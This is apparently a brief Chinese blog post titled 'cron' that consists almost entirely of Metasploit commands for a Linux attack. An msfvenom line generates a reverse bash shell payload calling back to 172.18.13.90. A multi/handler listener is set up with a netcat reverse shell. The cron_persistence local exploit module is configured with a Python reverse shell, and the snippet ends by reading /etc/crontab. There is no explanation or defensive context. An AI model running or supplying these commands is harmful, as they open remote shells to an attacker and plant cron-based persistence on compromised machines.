cron

2022-07-06 10:52:49 浏览数 (1)

代码语言:javascript复制
msfvenom -p cmd/unix/reverse_bash LHOST=172.18.13.90 LPORT=9898 -f raw > shell.sh
use exploit/multi/handler
set payload  cmd/unix/reverse_netcat
set lhost 172.18.13.90
set lport 9797
exploit -j
use exploit/linux/local/cron_persistence
set target 2
set payload cmd/unix/reverse_python
cat /etc/crontab

0 人点赞